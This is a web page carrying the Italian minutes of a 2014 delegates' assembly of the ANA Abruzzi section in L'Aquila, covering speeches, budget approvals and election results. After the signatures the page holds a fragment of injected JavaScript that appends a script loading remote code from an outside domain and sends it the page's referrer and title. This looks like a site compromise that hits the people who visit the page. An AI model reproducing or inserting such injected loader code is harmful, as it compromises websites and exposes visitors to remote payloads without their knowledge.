A.N.A. Sezione Abruzzi

Verbale Assemblea delegati 16/03/2014

aprile 15th, 2014  |  Published in Comunicazioni, Verbali assemblea

ASSEMBLEA DEI DELEGATI DELLA SEZIONE ABRUZZI

L’AQUILA 16 MARZO 2014

 

VERBALE

 

Il giorno 16 MARZO 2014, alle ore 10,00 in seconda convocazione, si é tenuta a L’Aquila presso l’Hotel Canadian l’Assemblea Ordinaria dei Delegati della Sezione ANA Abruzzi 2014.

convocata ai sensi dell’art. 11 del Regolamento Sezionale.

Il Presidente, prima di iniziare l’Assemblea, chiama al tavolo della Presidenza il Cons Nazionale e Vice Presidente Vicario Antonello Di Nardo ed il Sig. Valerio Cieri ex Vice Presidente Nazionale nonché Presidente Onorario della Sezione,

Il Presidente della Sezione dichiara aperta l’Assemblea e passa ai lavori della stessa che prevede per procedura regolamentare il seguente:

ORDINE DEL GIORNO:

  1. Onori alla Bandiera
  2. Nomina del Presidente, Segretario dell’Assemblea e tre scrutatori;
  3. Verifica dei poteri;
  4. Lettura ed approvazione Verbale dell’Assemblea Straordinaria dei Delegati del 10 novembre 2013;
  5. Relazione Morale del Presidente per l’anno 2013 e relativa approvazione;
  6. Rendiconto economico e finanziario anno 2013; relazione Revisori dei Conti, approvazione;
  7. Bilancio previsionale anno 2014 approvazione;
  8. Tesseramento anno 2014 – determinazione quota associativa anno 2014;
  9. Elezione del Presidente sezionale, triennio 2014-2017;
  10. Elezione dei Consiglieri Sezionali: Ratifica elezioni delle zone, triennio 2014-2017;
  11. Elezione Revisori dei Conti e Componenti la Giunta di scrutinio, triennio 2014-2017;
  12. Elezione dei Delegati all’Assemblea Nazionale 2014.

 

1°Punto all’ordine del giorno: Onori alla Bandiera.

Il Presidente Natale invita tutti i presenti ad alzarsi in piedi per rendere gli Onori alla Bandiera ed al nostro Vessillo Sezionale.

 

2°Punto all’ordine del giorno: Nomina del Presidente e del Segretario dell’Assemblea.

Il Presidente della Sezione Abruzzi Giovanni Natale indica l’ex Presidente Carlo Frutti a presiedere L’Assemblea e il Socio Marmotta Roberto a svolgere le funzioni di Segretario, propone inoltre di anticipare le operazioni di voto per  il rinnovo del Presidente Sezionale; vengono quindi individuati gli scrutatori nelle persone di Luciani Giuliano, Nicolai Giovanni e Di Giulio Umberto.

L’Assemblea dei Delegati approva all’unanimità

 

3°Punto all’ordine del giorno: Verifica dei poteri.

 

Si procede alla verifica della validità dell’assemblea, previo controllo dei gruppi presenti, si riscontra la presenza di  n°  di 240 delegati su  332, si da atto quindi della validità della stessa.

 

4°Punto all’ordine del giorno: Lettura ed approvazione Verbale dell’Assemblea straordinaria dei  Delegati del 10 novembre 2013.

Il Presidente Carlo Frutti dà lettura del Verbale dell’Assemblea Straordinaria  dei Delegati del 10 novembre 2013. Terminata la quale viene messa a votazione l’approvazione dello stesso

che viene approvato all’unanimità.

 

5°Punto all’ordine del giorno: Relazione morale del Presidente per l’anno 2013 lettura e approvazione.

Il Presidente Natale procede alla lettura della relazione morale per l’anno 2013, che si allega al presente verbale per costituirne parte integrante.

A seguire si apre la discussione sull’argomento stesso ed intervengono:

  • . Capri Maurizio (Rocca di Mezzo) interviene complimentandosi con il Presidente, invita ad andare avanti sulla strada intrapresa e a valutare bene la copertura finanziaria relativa alla gestione dell’adunata nazionale L’Aquila 2015, esprime preoccupazione per  eventuali tagli alla spesa pubblica che possano influire negativamente sull’organizzazione della stessa, raccomanda di avere attenzione e rigorosità nella gestione, comunica che i gruppi della 1ª e 2ª zona si aspettano un coinvolgimento, invita inoltre a coinvolgere tutto il territorio e le Amministrazioni Comunali.
  • Sansone (Avezzano) interviene esprimendo orgoglio per l’evento Adunata 2015 e per  essere iscritto all’ANA dal 1952, esprime delusione per quanto accaduto nell’Assemblea straordinaria dei  Delegati dell’ 10 novembre 2013, invita il Presidente a continuare per la strada intrapresa, esprime altresì disappunto riguardo all’eccessivo costo dei Parcheggi nella manifestazione di Isola del Gran Sasso.
  • Di Matteo Mauro (Cortino) condivide  quanto espresso dal Presidente nella Relazione ma non solidarizza e ribadisce quanto già espresso nella precedente adunanza riguardo il rispetto delle regole. Invita ad avere la massima attenzione nella gestione dell’Adunata L’Aquila 2015, a riflettere sull’aspetto mediatico della stessa, in particolare nella gestione delle comunicazioni e ad evitare strumentalizzazioni.
  • Di Marco (Pescara) si complimenta con il Presidente per quanto espresso nella Relazione morale e per aver svolto, negli anni, egregiamente il proprio dovere, critica la Segreteria Nazionale ANA per aver revocato quanto deliberato nell’Assemblea straordinaria dei  Delegati dell’ 10 novembre 2013, richiama tutti alla giusta considerazione degli appelli del Presidente Natale.
  • Evangelista (Borrello) apre ricordando l’ex Presidente Sezionale Festa, ringrazia il Presidente Natale per l’impegno profuso, evidenzia il proprio impegno quale capogruppo, l’acquisto di un defibrillatore, le attività svolte dal nucleo di protezione civile e dei propri iscritti.
  • Della Volpe (Arsita) Esprime rammarico per non essere stato, nonostante l’impegno profuso, rieletto alla carica di consigliere Sezionale. Critica i gruppi della 9ª zona per aver sollecitato nuove elezioni e di conseguenza il tempo perso allo scopo, evidenzia le votazioni dei consiglieri per delega quale sistema mai usato in precedenza.
  • Bellucci Carmine (Torre dei Nolfi) Ringrazia per quanto è stato fatto ad oggi, segnala che ci sono ancora rancori all’interno dell’associazione temendo che questo possa influire negativamente sull’organizzazione e gestione dell’adunata 2015. Invita tutti a lavorare per il traguardo che ci aspetta e per l’accoglienza a tutti gli alpini d’Italia.
  • Giulio Ciarelli (Isola del Gran Sasso) spiega che il problema sollevato riguardo al costo eccessivo dei parcheggi non è imputabile al gruppo di Isola ma all’Amministrazione Comunale che di propria iniziativa ha disposto in merito, senza  preventivo avviso nemmeno al locale gruppo alpini.
  • Di Carlo Antonio (Teramo) Illustra le attività sportive svolte dagli iscritti e gli ottimi risultati raggiunti, ringrazia V. Bucci per l’organizzazione e l’impegno nella manifestazione di Roccaraso. Invita tutti ad una maggiore partecipazione alle competizioni organizzate dall’ANA, a recuperare gli alpini dormienti, a chiudere le polemiche in atto, richiama alla democrazia e ringrazia gli atleti per l’impegno profuso e per le soddisfazioni avute.
  • Giovanni Ursitti (Opi) Ringrazia il Presidente Natale per quanto espresso nella relazione, si riallaccia a quanto espresso dal collega di Rocca Di Mezzo, evidenzia che l’Adunata 2015 riguarda tutto l’Abruzzo, sollecita l’attivazione della posta elettronica d a parte di tutti i gruppi, invita a pubblicare i verbali delle assemblee sul sito internet.

 

Il Presidente ascoltati gli interventi dei soci replica:

 

  • A Capri Maurizio (Rocca di Mezzo) che l’adunata sarà gestita dal COA (comitato organizzatore adunata) di cui la Sezione Abruzzo è componente attivo, evidenziando che gli alpini non danno contributi ma servizi, ricordando altresì che le garanzie economiche sono state già date dal Comune dell’Aquila, dalla Provincia e dalla Regione.
  • A Sansone(Avezzano) approva e si scusa per il disappunto evidenziato rispetto al costo dei parcheggi a Isola del Gran Sasso, conferma quanto affermato da Ciarelli rispetto alle disposizioni dell’Amministrazione Comunale.
  • A Di Matteo(Cortino), ringrazia e ribadisce di non aver mai avuto problemi a votare, invita alla tranquillità e collaborazione, richiama inoltre la competenza del COA sull’Adunata.
  • A Di Marco (Pescara) ringrazia per quanto detto.
  • A Evangelista (Borrello) conferma la vicinanza al gruppo, encomia La figura di Festa e il suo impegno per la P.C.
  • A Della Volpe (Arsita) ringrazia per quanto detto, esprime solidarietà e comprensione per quanto accaduto, invito alla sopportazione reciproca ed a non inasprire la polemica.
  • A Bellucci Carmine (Torre Dei Nolfi) di condividere pienamente quanto comunicato.
  • A Ciarelli Giulio (Isola del Gran Sasso) ringrazia per l’impegno profuso e per l’operatività del gruppo.
  • Antonio Di Carlo(Teramo) ringrazia per quanto fatto per lo sport e si complimenta per i risultati ottenuti nelle varie discipline.
  • Ursitti (Opi) di recepire la proprie proposte.

L’Assemblea dei Delegati approva la relazione morale 2013 all’unanimità.

 

6°Punto all’ordine del giorno:  Rendiconto economico e finanziario anno 2013; relazione Revisori dei Conti.

Il Presidente procede alla lettura ed esposizione del rendiconto economico e finanziario 2013 e alla relazione dei revisori dei conti.

L’Assemblea dei Delegati approva all’unanimità.

 

7°Punto all’ordine del giorno: Bilancio previsionale anno 2014.

Il Presidente procede alla lettura ed esposizione del  bilancio previsionale 2014.

L’Assemblea dei Delegati approva all’unanimità

 

8°Punto all’ordine del giorno: Tesseramento anno 2015 – determinazione quota associativa.

Il Presidente propone di lasciare immutata la quota associativa per l’anno 2015, riservandosi, qualora necessario, di proporre eventuale piccolo aumento finalizzato a finanziare l’adunata l’Aquila 2015.

L’Assemblea dei Delegati approva all’unanimità.

 

9°Punto all’ordine del giorno: Elezione Presidente Sezionale triennio 2014-2017

Avuti i risultati dello scrutinio Il Presidente dell’Assemblea comunica i seguenti risultati:

Schede votate per n. delegati 240:

  • N. 1 scheda nulla
  • N. 11 schede bianche
  • N. 3 voti a favore di Antonio Di Carlo
  • N. 3 voto a favore di Antonio Purificati
  • N. 222 voti Giovanni Natale

Risulta eletto e viene proclamato Presidente per il triennio 2014 – 2017 Giovanni Natale con 222 voti su 240votanti.

 

10°Punto all’ordine del giorno: Elezione Consiglieri Sezionali – Ratifica elezioni di zona , triennio 2014-2017.

Il Presidente dell’Assemblea invita i consiglieri sezionali neo eletti nelle riunioni di zona ad avvicinarsi al tavolo della presidenza, successivamente da comunicazione All’assemblea dei nominativi e propone la ratifica dell’elezione degli stessi come da regolamento..

L’Assemblea dei Delegati approva all’unanimità.

 

11°Punto all’ordine del giorno: Elezione dei revisori dei conti e Componenti la Giunta di Scrutinio, triennio 2014 – 2017.

Avuti i risultati dello scrutinio Il Presidente dell’Assemblea comunica i seguenti risultati:

Revisore dei conti:

  • N. 210 Di Carlo Antonio
  • N. 72 Pepe Vincenzo
  • N. 74 Iandi Marino
  • N. 79 Eboli Ezio
  • N.. 2 Bianche

Giunta di scrutinio:

  • N. 198 d’Angelo Fabio
  • N. 143 Rotellini Mario
  • N. 7 Bianche

 

12°Punto all’ordine del giorno: Delegati alla Assemblea Nazionale anno 2014

Si da lettura dell’elenco dei Delegati All’Assemblea Nazionale 2014  con l’elenco dei  nominativi  di cui si allega copia.

L’Assemblea dei Delegati approva all’unanimità.

 

Esaminati tutti i punti all’ordine del giorno l’Assemblea viene chiusa alle ore 13.00.

 

Il Segretario

Roberto MARMOTTA

Il Presidente dell’Assemblea

Carlo FRUTTI

                                                                                                          

 }d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Your Comments

L’Alpino d’Abruzzo